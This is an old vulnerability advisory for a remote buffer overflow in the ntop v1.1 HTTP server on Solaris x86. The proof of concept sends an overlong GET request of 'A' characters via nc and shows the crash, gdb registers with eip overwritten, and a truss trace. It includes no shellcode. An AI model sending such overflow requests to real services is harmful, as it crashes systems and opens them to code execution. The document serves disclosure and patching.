Ntop v1.1 for Solaris/x86 contains a remotely exploitable buffer overflow in the http server which defaults to tcp port 8080.
2a782b423c71b7af0e40453edb9508bf1af85c5776966f021fe5b239fb24adbc
======================================================================
Remote Buffer Overflow Under Solaris_x86
NTOP - NEtwork Monitor vulnerable to compromise the system
Author: alt3kx! <alt3kx@@raza-mexicana.org>
Alternative: <alt3kx_h3z@hotmail.com>
Date: 2001-05-23
Site: www.raza-mexicana.org
Greet to: _0x90_, Dex, PaTa , Rebel and S0r from AR & Spain
Teams: Raregazz - X-ploit and S0d
in special to White-B
======================================================================
------------------------=[Brief Description]=-------------------------
Exist the buffer overflow around 300 characteres, when u sending to
port running the daemon, in this caseis port 8080 the users can
execute code malicious to obtain high privilegies.
--------------------------=[Plataforms]=--------------------------
Sun Solaris 7.0_x86
Sun Solaris 2.6_x86
---------------------------=[Summary]=----------------------------
Proof of concept :
# ls -la /opt/ntop/bin/ntop
-rwsr-xr-x 1 bin bin 249680 May 3 1999 /opt/ntop/bin/ntop
#
One step
Run ntop as root the daemon
# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
.
.
.
.
.
Two step:
Run the next script as user normal:
[local]:alt3kx# printf "GET /`perl -e 'print "A"x245'`\r\n\r\n" |nc
localhost 8080
HTTP/1.0 200 OK
Server: ntop/1.1 (i386-pc-solaris2.7)
Content-type: text/html
<HTML>
<HEAD>
<META HTTP-EQUIV=REFRESH CONTENT=120>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
<P><H1><FONT FACE=Helvetica>Unable to find information related to
host<i>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
FRESH
CONTENT=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</i></FONT></H1>
</CENTER>
</CENTER><hr><FONT FACE=Helvetica><H5>Generated by <A
HREF="https://www-serra.unipi.it/~ntop/">ntop</A> v.1.1 MT
[i386-pc-solaris2.7] listening on elxl0<br>
<address>© 1998-99 by <A HREF=mailto:deri@unipi.it>L.
Deri</A></H5></font></BODY></HTML>
[local]:alt3kx#
SUCKS!!! NOT FUNCTIONALitY, AGAIN with more A´s :-)
[local]:alt3kx# printf "GET /`perl -e 'print "A"x246'`\r\n\r\n" |nc
localhost 8080
[local]:alt3kx#
Another shell u can see this
# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
Segmentation Fault(coredump)
#
[local]:alt3kx# gdb ntop --core=core
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-pc-solaris2.7"...
Core was generated by `ntop'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /lib/libsocket.so.1...done.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /lib/libgen.so.1...done.
Reading symbols from /lib/libc.so.1...done.
Reading symbols from /lib/libdl.so.1...done.
Reading symbols from /lib/libmp.so.2...done.
#0 0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0xdffe19c8 -536995384
edx 0x20a 522
ebx 0x80cef44 135065412
esp 0x8046f14 0x8046f14
ebp 0x41414141 0x41414141
esi 0xc8 200
edi 0x80980f5 134840565
eip 0x41414141 0x41414141
eflags 0x10206 66054
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x0 0
(gdb)
[local]:alt3kx# truss /opt/ntop/bin/ntop
open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xDFFE1000
sysconfig(_CONFIG_PAGESIZE) = 4096
open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libsocket.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFDF000
mmap(0x00000000, 40960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFD4000
mmap(0xDFFDC000, 5712, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xDFFDC000
close(4) = 0
open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libnsl.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 503808, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0xDFF58000
mmap(0xDFFC5000, 23248, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 442368) = 0xDFFC5000
mmap(0xDFFCB000, 29472, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFFCB000
close(4) = 0
open("./libgen.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libgen.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 32768, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF4F000
mmap(0xDFF55000, 4184, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 20480) = 0xDFF55000
close(4) = 0
open("./libc.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libc.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 593920, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0xDFEBD000
mmap(0xDFF46000, 25448, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 557056) = 0xDFF46000
mmap(0xDFF4D000, 3316, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFF4D000
close(4) = 0
open("./libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libdl.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
close(4) = 0
open("./libmp.so.2", O_RDONLY) Err#2 ENOENT
open("/lib/libmp.so.2", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBB000
mmap(0x00000000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEB6000
mmap(0xDFEB9000, 2524, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xDFEB9000
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xDFEB4000
close(4) = 0
close(3) = 0
[...............]
door_info(3, 0x08044528) = 0
door_call(3, 0x08044510) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
bug discovered by alt3kx! <alt3kx@raza-mexicana.org> &
<alt3kx_h3z@hotmail.com>
Possible C0de cooming soon .... je :-)
---------------------------=[PATCH]=-----------------------------
Download the last packages from Sun Microsystems
-------------------------=[Company Compromise]=-------------------
https://www.sun.com
https://www.ntop.org